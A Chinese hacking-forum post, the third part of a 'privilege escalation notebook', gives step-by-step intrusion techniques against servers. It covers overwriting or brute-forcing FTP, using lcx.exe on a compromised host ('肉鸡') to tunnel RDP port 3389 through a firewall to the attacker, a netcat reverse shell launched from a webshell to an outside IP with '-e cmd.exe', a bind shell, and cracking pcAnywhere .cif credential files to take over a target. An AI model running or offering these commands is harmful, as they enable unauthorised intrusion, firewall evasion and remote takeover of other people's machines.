提权笔记本(3)

【21端口FTP提权】
如果21端口开放那么可能网站是通过Ftp进行管理,此时我们可以尝试找到其Ftp文件目录,覆盖住FTP的文件即可提权。或者爆破Ftp

【lcx内网转发/内网提权/neiwangzhuanfa/neiwangtiquan/端口转发/内网转发/】

梗概:将服务器的3389通过lcx.exe转发到本地的
将服务器的3389端口转发到本地的19端口,然后我们外网电脑监听19端口并且转发到9999端口.从而就将服务器的3389端口间接地转发到了9999端口.

本地执行
lcx.exe -listen 19 9999 /*15为监听端口,9999为转发端口*/
shell执行
lcx.exe -slave 服务器IP/即shell IP/即目标要转发的IP 19 127.0.0.1 3389


连接 远程桌面填上地址为 服务器内网IP:9999


###源于互联网,恐咱写的不够全面
端口转发

适用情况:
1.目标主机在内网,我们无法链接(这种情况和第二种适用方法一样)
2.目标主机有防火墙,阻断我们链接
lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口
防火墙一般是会阻断由外向内的通信,而不会阻断由内向外的通信,因此我们可以利用这个原理实现端口转发



本机: lcx -listen 2222 3333

2222为转发端口,3333为本机任意未被占用的端口
肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口
3389连接时格式 127.0.0.1:3333
### 结束###

### nc反弹:
webshell下面执行命令有时候没有回显,在nc反弹的窗口下面是有回显的。
通过webshell反弹的cmd继承IIS的权限,一般权限较低。但是还是很方便执行系统命令的

E:\web\nc -vv 125.92.61.202 8080 -e E:\web\cmd.exe(webshell执行的)
nc -vv -l -p 8080 (本机执行的)
-l:监听端口,监听入站信息
-p:后跟本地端口号
-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息


E:\web\nc -l -p 110 -t -e E:\web\cmd.exe
telnet 连接服务器ip 端口
-l 监听本地入栈信息
-p port 打开本地端口
-t 以telnet形式应答入栈请求
-e 程序重定向
### 结束###

【Pcanywhere提权/Pcanywhere远控提权】
思路:找到安装目录破解(破解软件:symantec pcanywhere password crack)pcanywhere配置文件(PCA.serven.CIF),然后本机搭建pcawhere环境进行远程连接目标机
以下是详细步骤
pcanywhere默认安装目录:C:\Program Files\sysmantec\pcanywhere

需要在本地安装此软件,然后找到后缀为cif的(在其安装目录的Hosts目录下)。保存至本机。并下载专门的pcanywhere破解软件进行破解。
破解完成后打开Pcanywhere远程软件新建一个主控端连接目标服务器。
具体操作如下;

选择主控端-右键选择高级-设置(输入目标IP)-安全性选项(设置级别:pcanywere编码)-成功操作完成
点击你刚才新建的主控端右击开始远程遥控,然后需要登录,直接输入你破解的CIF的帐号密码登录即可。

以下非本人所笔,来源于互联网因(怕各位觉得俺写的不够全面)
### pcanywhere提权:

在服务器里安装好软件,添加被控端,设置好密码就ok了,在本机安装好软件,添加主控端,填上ip,密码等,选好加密 方式(任一都可以),直接连接
pcanywhere所开放的端口5631、5632

利用工具破解*.cif文件

默认路径: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts
找到hosts目录的.cif文件。然后本地明小子破解。
### 结束###
转载请注明本文链接: http://www.mayidui.net/t2294.html
游客
登录后才可以回帖,登录 或者 注册